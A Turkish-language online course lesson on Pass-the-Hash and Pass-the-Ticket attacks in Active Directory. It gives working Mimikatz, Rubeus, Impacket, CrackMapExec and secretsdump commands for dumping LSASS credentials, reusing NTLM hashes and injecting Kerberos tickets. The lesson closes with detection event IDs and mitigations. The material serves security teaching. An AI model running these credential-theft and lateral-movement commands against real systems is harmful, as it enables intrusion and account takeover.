Pass-the-Hash ve Pass-the-Ticket Saldırıları
Düz metin parolaları bilmeden yanal hareket etmek için kimlik bilgisi özetlerini ve Kerberos biletlerini kullanın.
Pass-the-Hash ve Pass-the-Ticket Saldırıları, CoddyKit'te ücretsiz bir Cyber Security Academy dersidir. Bu, 4 dersinin 2. dersidir. Aşağıdan dersin tamamını ücretsiz okuyabilir, sonra tarayıcıda yerleşik kod editörü ve 7/24 yapay zeka koçu ile uygulamalı olarak pratik yapabilirsin. Bu, Cyber Security Academy öğrenme yolunun bir parçasıdır ve ilerlemeniz web ve CoddyKit uygulaması arasında senkronize olur. Cyber Security Academy kursu toplamda 4 dersten oluşur.
Bu Saldırılar Neden Var
Windows kimlik bilgisi protokolleri kimlik doğrulama sırlarını (NTLM karmaları, Kerberos biletleri) bellekte depolar. SYSTEM ayrıcalıklarına sahip bir saldırgan bu sırları çıkarabilir ve parolaları bilmeden diğer kullanıcılar olarak kimlik doğrulamak için yeniden kullanabilir.
Mimikatz ile NTLM Karmalarını Çıkarma
Windows'ta Mimikatz, kimlik bilgisi çıkarma için başlıca araçtır. SYSTEM/Yönetici olarak çalıştırıldığında NTLM karmalarını ve açık metin kimlik bilgilerini çıkarmak için LSASS işlem belleğini okur.
# Run mimikatz as Admin:
mimikatz.exe
# Enable debug privilege
privilege::debug
# Dump LSASS credentials
sekurlsa::logonpasswords
# Dump local SAM hashes
lsadump::samMimikatz ile Karmayı Geçirme (PtH)
PtH, açık metin parolayı bilmeden yeni bir oturuma NTLM karması enjekte eder. Karma, NTLM kullanarak uzak hizmetlerde kimlik doğrular — diğer Windows ana bilgisayarlarına yanal hareket için etkilidir.
# Pass-the-Hash with Mimikatz:
sekurlsa::pth /user:Administrator /domain:CORP \
/ntlm:aad3b435b51404eeaad3b435b51404ee \
/run:cmd.exe
# Opens cmd.exe authenticated as that userImpacket ile Karmayı Geçirme
Impacket, PtH için Python araçları sağlar: psexec.py, smbexec.py ve wmiexec.py, uzak komut yürütme için NTLM karmalarını doğrudan kabul eder.
# psexec with hash (Linux → Windows)
psexec.py CORP/Administrator@192.168.1.100 \
-hashes aad3b435...:8846f7eaee8fb117...
# wmiexec
wmiexec.py CORP/Admin@192.168.1.100 \
-hashes :8846f7eaee8fb117ad06bdd830b7586cKerberos Biletlerini Çıkarma
Kerberos biletleri LSASS belleğinde de depolanır. Mimikatz bunları çıkarır; Rubeus, Windows'ta Kerberos bileti işlemleri için özelleşmiş araçtır.
# Mimikatz: export all tickets
sekurlsa::tickets /export
# Rubeus: list tickets
Rubeus.exe triage
# Rubeus: dump specific ticket
Rubeus.exe dump /luid:0x3e7 /service:krbtgtBileti Geçirme (PtT)
PtT, çalınmış bir Kerberos biletini geçerli oturuma enjekte eder. Bilet, hizmetlerde biletin asıl sahibi olarak kimlik doğrular — karma veya parola gerekmez.
# Mimikatz: inject ticket
kerberos::ptt ticket.kirbi
# Rubeus: inject ticket
Rubeus.exe ptt /ticket:ticket.kirbi
# Verify injection
klistLSASS Belleğini Uzaktan Dökme
Bir erişim noktası elde ettikten sonra, CrackMapExec veya Impacket'ın secretsdump aracıyla LSASS belleğini uzaktan dökün — hedefte etkileşimli oturum gerekmez.
# CrackMapExec
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --sam
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --lsa
# Impacket secretsdump
secretsdump.py CORP/Admin:Password123@192.168.1.100Yanal Hareket Yolları
Biletleri veya karmaları elde ettikten sonra yanal hareket edin: yerel yönetici hesaplarının yeniden kullanıldığı diğer makinelerde PtH kullanın, etki alanı hizmetlerine erişmek için PtT kullanın ve ayrıcalıklı hesapları hedefleyerek etki alanı yöneticisi ayrıcalıklarına doğru yükselin.
PtH ve PtT'yi Algılama
Savunmacılar PtH'yi şu yollarla algılar: etkileşimli oturum açmaya karşılık gelmeyen, oturum açma türü 3 olan Olay ID 4624 (oturum açma) kayıtları; NTLM kimlik doğrulama anormallikleri ve bellekte veya diskte Mimikatz imzaları.
# Detection event IDs:
# 4624: Logon (look for type 3 = network)
# 4776: NTLM auth (watch for unexpected hosts)
# 4769: Service ticket request (Kerberos)
# 4648: Explicit credential useÖnlemler
Temel önlemler şunlardır: Kimlik Bilgisi Koruması'nı (LSASS'ı sanallaştırmayla korur) etkinleştirmek, makineler arasında yerel yönetici hesaplarının yeniden kullanımını kısıtlamak (LAPS), ayrıcalıklı hesaplar için Korumalı Kullanıcılar grubunu zorunlu kılmak ve mümkün olan yerlerde NTLM'yi devre dışı bırakmak.
Karma Üzerinden Geçiş
Karma üzerinden geçiş, bir NTLM karmasını Kerberos TGT'sine dönüştürür. Bu yöntem, NTLM'nin engellendiği ancak Kerberos'un kullanılabildiği ortamlarda veya daha ileri Kerberos saldırıları için TGT gerektiğinde yararlıdır.
# Mimikatz: overpass-the-hash
sekurlsa::pth /user:Admin /domain:CORP \
/ntlm:8846f7eaee8fb117ad06bdd830b7586c \
/run:powershell.exe
# Then in new session:
Rubeus.exe asktgt /user:Admin /rc4:8846f7ea...Hızlı Kontrol
Hangi Windows güvenlik özelliği, sanallaştırma kullanarak LSASS kimlik bilgisi depolamasını korur?
Özet: PtH ve PtT
Karmayı Geçirme ve Bileti Geçirme, Active Directory'de yanal hareketin temelini oluşturur. Her ikisi de LSASS'ta Windows kimlik bilgilerinin önbelleğe alınmasından yararlanır. Mimikatz ve Impacket, çıkarma ve yeniden kullanmayı çok kolaylaştırır. Kimlik Bilgisi Koruması, LAPS, Korumalı Kullanıcılar grubu ve NTLM ile Kerberos kimlik doğrulama olaylarının sıkı biçimde izlenmesiyle savunma sağlayın.
Sıkça Sorulan Sorular
“Pass-the-Hash ve Pass-the-Ticket Saldırıları” dersi ücretsiz mi?
Evet — “Pass-the-Hash ve Pass-the-Ticket Saldırıları” dersin tüm metni burada web'de ücretsiz olarak okunabilir. Etkileşimli olarak pratik yapmak (yerleşik kod editörü ve 7/24 yapay zeka koçu) ve Cyber Security Academy kursunun geri kalanını açmak için CoddyKit PRO'ya yükselt. Cyber Security Academy kursu toplamda 4 dersten oluşur.
“Pass-the-Hash ve Pass-the-Ticket Saldırıları” dersinde ne öğreneceğim?
Düz metin parolaları bilmeden yanal hareket etmek için kimlik bilgisi özetlerini ve Kerberos biletlerini kullanın. Cyber Security Academy ile uygulamalı kodu tarayıcıda doğrudan çalıştırarak pratik yaparsın ve 7/24 yapay zeka koçu dersi çalışırken sorularını yanıtlar.
Cyber Security Academy öğrenmeye başlamak için deneyim gerekli mi?
Önceden deneyim gerekmez. CoddyKit'te Cyber Security Academy, başlangıçtan ileri seviyeye kadar yapılandırıldığı için buradan başlayabilir veya başından başlayıp kendi hızında ilerleme yapabilirsin. Bu, 4 dersinin 2. dersidir.
“Pass-the-Hash ve Pass-the-Ticket Saldırıları” dersi ne kadar sürer?
Çoğu CoddyKit dersi yaklaşık 5–10 dakika sürer. Her biri kısa ve etkileşimli olduğu için sabit ilerleme yaparsın ve web ile uygulama arasında tam olarak bıraktığın yerden devam edebilirsin.
Bu Cyber Security Academy dersinde kod yazıp çalıştırabilir miyim?
Evet. Her Cyber Security Academy dersi yerleşik bir kod editörü içerir, bu sayede tarayıcıda gerçek kod yazıp çalıştırabilir ve anlık yapay zeka geri bildirimi alırsın — yerel kurulum gerekli değildir.
Bu kursun tüm dersleri
- Windows Kimlik Doğrulaması: NTLM ve Kerberos
- Pass-the-Hash ve Pass-the-Ticket Saldırıları
- Kerberoasting ve AS-REP Roasting
- Active Directory Güçlendirmesi